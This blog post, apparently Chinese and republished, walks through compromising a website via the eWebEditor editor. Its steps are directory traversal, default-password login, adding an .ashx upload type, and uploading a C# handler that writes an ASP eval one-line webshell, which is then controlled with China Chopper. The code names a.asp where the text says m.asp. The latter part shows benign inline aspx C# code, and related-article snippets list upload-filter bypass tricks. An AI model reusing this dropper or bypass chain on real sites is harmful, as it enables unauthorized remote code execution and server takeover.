aspx写cs后台代码(突破上传过滤一招,利用ashx)

最新推荐文章于 2024-06-25 05:21:49 发布
最新推荐文章于 2024-06-25 05:21:49 发布
阅读量4.4k 收藏
点赞数
分类专栏: 安全

http://www.2cto.com/Article/201302/188962.html

前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,

正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。
 
用自动扫描脚本扫描出敏感目录
inc/ewebeditor/admin_login.asp
既然有ewebeditor编辑器那就尝试下编辑器 漏洞把。
 
/inc/ewebeditor/admin/upload. asp?id=6&d_viewmode=list&dir=../
 
直接遍历来了。
 
使用默认密码登录ewebeditor后台,新添加样式,本想很容易解决。
上传免杀小马
 
加密一句话也是一样的结果。
 
那我们怎么解决之个问题呢-
首先在编辑器样式的上传文件添加ashx后缀
在上传我们的Ashx马。
 
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {
 
    public void ProcessRequest (HttpContext context) {
        context.Response.ContentType = "text/plain";
 
        StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));
        file1.Write("<%eval request(\"a\")%>");
        file1.Flush();
        file1.Close();
 
    }
 
    public bool IsReusable {
        get {
            return false;
        }
    }
 
}
 
 
接下来访问http://www.xxx.com/UploadFile/eWebEditor/201329112155838.ashx
 
会在eWebEditor生成一个m.asp文件(一句话木马)
 
用菜刀访问http://www.2cto.com /UploadFile/eWebEditor/m.asp
 
就突破了



我们新建的ashx一般都带.cs文件,这里把cs文件的后台代码写在了ashx文件里面然后把cs文件删了,然后把ashx文件头部的CodeBehind="Handler.cs"这句去掉. (vs中选中ashx文件右键打开方式:xml编辑器打开)

http://cache.baiducontent.com/c?m=9f65cb4a8c8507ed4fece763104687270e54f7327d818c027fa3cf1fd5791d1c053db2fa3a211306d0cf786600ad5d19b7b0607d207326a0efbb9f3bddace55838895723061e913114c418dfdc3023d656e34de8df4aa6f8ba2592dec5a2dd4324be&p=8d33c64ad49e57ff57e9c02945&newp=8b2a971bcc9e15e808e290625553d8274e39806238d68e0f2280d4&user=baidu&fm=sc&query=%B4%FA%C2%EB%D0%B4%D4%DAaspx%C0%EF&qid=b3ba798900012663&p1=10

在aspx也写cs后台代码: 在HTML页面写C#代码其实和与在后台一样,只要把设计器生成的代码也加入进去就行。(继承:<script language="C#" runat="server"></script>这样的代码如何继承吧? 页面顶部 <%@ page language="c#" inherits="命名空间, 类名" %>)
http://www.cnblogs.com/cuihongyu3503319/archive/2012/06/23/2559552.html
<script language= "c#"  runat= "server" >
 
     #region Page_Load
     private  void  Page_Load( object  sender, System.EventArgs e)
     {
         if  (!Page.IsPostBack)
         {
         }
     }
     #endregion
 
     #region Web Form Designer generated code
     override  protected  void  OnInit(EventArgs e)
     {
         //
         // CODEGEN:该调用是 ASP.NET Web 窗体设计器所必需的。
         //
         InitializeComponent();
         base .OnInit(e);
     }
 
     /// <summary>
     /// 设计器支持所需的方法 - 不要使用代码编辑器修改
     /// 此方法的内容。
     /// </summary>
     private  void  InitializeComponent()
     {
 
         this .Load += new  System.EventHandler( this .Page_Load);
 
     }
     #endregion


jelenyoung
关注
专栏目录
绕过限制上传文件
10-05
文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将代码植入到服务器中,再通过url去访问以执行代码。但在一些安全性较高的web应用中,往往会有各种上传限制和过滤,导致我们无法上传特定的文件。就需要用到这个工具去绕过各种限制上传文件
aspx页面c#后台代码
weixin_30338461的博客
06-23 553
<script language="c#" runat="server"> #region Page_Load private void Page_Load(object sender, System.EventArgs e) { if (!Page.IsPostBack) ...
[web安全-文件上传漏洞解析,及常见绕过方式]简单易懂超友好
最新发布
2301_82242964的博客
06-25 683
中国蚁剑 中国菜刀 冰蝎木马就是我们需要想办法上传到对方服务器并运行的恶意代码,不理解可以继续往下看asp的一句话是:aspx的一句话是:%>还有好多木马,可以自己查找收集哦上面的标红的pass是你链接你这个木马的密码,也可以设置成自己想要的密码。一句话木马+webshell工具通常是一起使用的,先上传让服务器解析你的恶意代码,然后用webshell连接即可。要有时常判断的眼光进行判断。
aspx后台代码在前段
weixin_30326515的博客
08-15 106
aspx后台代码在前段 合并cs代码 <%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %> <%@ Import Name...
aspx.cs代码到前台页面中
weixin_30855099的博客
01-11 216
<%@ Page Language="C#" AutoEventWireup="true" %><!DOCTYPE html><html><head> <title>sleepTest</title></head><body> <form id="form1" runat="...
jQuery ajax调用后台aspx后台文件的两种常见方法(不是ashx)
11-22
asp.net webForm开发中,用Jquery ajax调用aspx页面的方法常用的有两种:下面我来简单介绍一下。 (1)通过aspx.cs的静态方法+WebMethod进行处理 简单的介绍下WebMethod方法的用法 1.修饰符主要用public static修饰...
asp.net利用ashx文件实现文件的上传功能
10-15
本文将详细介绍如何利用ASHX(HTTP Handler)文件来处理文件上传,包括两种不同的方法:传统的表单提交和使用jQuery + AJAX无刷新上传。 ### 方法一:表单提交 在这种方法中,我们创建一个HTML表单,设置`enctype=...
VS前段发送数据到后端aspx文件传值到cs文件
09-05
3. **数据传递到.cs文件**:aspx页面通常与.cs后台代码文件关联,它们共享同一个Page类实例。可以创建公共变量、属性或者使用Session来传递数据到.cs文件中的方法。例如,创建一个公共属性: ```csharp public ...
ashx介绍以及ashx文件与aspx文件之间的区别
10-26
- `.aspx` 文件由HTML和服务器控件组成,与`.cs`后缀的后台代码文件关联,两者分别负责前端展示和后端逻辑。 3. **处理流程**: - `.ashx` 文件中的`IHttpHandler`接口要求实现`ProcessRequest`方法,直接处理...
ajax连接cs后台,ajax请求aspx.cs后台方法
weixin_28679635的博客
08-05 861
前台jquery代码$(function () {$("#btnfix").click(function () {$.ajax({type: "post",url: "fix.aspx/test",contentType: "application/json; charset=utf-8",dataType: "json",success: function (data) {console.log...
上传后缀绕过
12-13
上传的限制不能上传某些的后缀,对于上传中各绕过的描述
aspx和cs之间的关系
Newd's Blog
04-14 2090
aspx和cs之间的关系: 1、 aspx相当于html模板,cs文件相当于ashx, 2、 aspx可以cs代码,可以调用cs内的代码(比如属性方法等。。), 3、  注意Cs文件的访问级别如果设置为Private,aspx无法访问!(为什么??)  用Response.Write(this.getType());(此方法打印出当前类名(Aspx))可以发现输出的并非Cs中的类名。
【学习笔记】文件上传绕过
chualam的博客
11-16 391
一般防御:JavaScript(直接禁用就好) content-type: image/gif (抓包改包) 文件内容头(GIF89a)利用copy命令把图片和木马结合 木马头加上内容头就可以了 后缀名黑白名单(大小绕过,能被解析的扩展名列表jsp jspx jspf asp asa cer aspxphp php php3 php4exe exee,) 配合文件包含漏洞(先上传一个包含恶意php代码的图片或者txt,有些waf只会对动态语言的页面进行验证) 文件名解析漏洞(test.asp.   tes
aspx与ashx,asmx之间的参数传递与调用
大牛的IT征程
11-03 7756
1、创建一个空web工程; 2、添加一个一般处理程序; 3、添加一个html类; 4、添加一个webservice; 测试1:  html加载ashx实现信息显示;效果等同于aspx的显示,区别:点击按钮后aspx方式仍保留输入的信息;                           //处理程序      public void Proc
文件上传漏洞
weixin_53696027的博客
02-24 313
关于文件上传漏洞绕过防护方式的一些方法
aspx 中轻松实现文件上传
图像识别讨论学习
08-10 3400
aspx 中轻松实现文件上传aspx中实现文件上传是非常容易的,如下代码:private string upLoadFile(System.Web.UI.HtmlControls.HtmlInputFile tFile,string FilePath){ if(tFile.PostedFile.ContentLength>0 ) {  string strFileName = Path.GetF
ASP.NET web组件解析:aspx、ascx与ashx详解
"本文总结了ASP.NET开发中常见的三种文件扩展名:.aspx、.ascx和.ashx的用途。.aspx用于创建Web窗体设计页面,包含视觉元素和编程逻辑,支持Visual Studio的设计视图和代码视图。.ascx是用户控件,封装特定功能和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值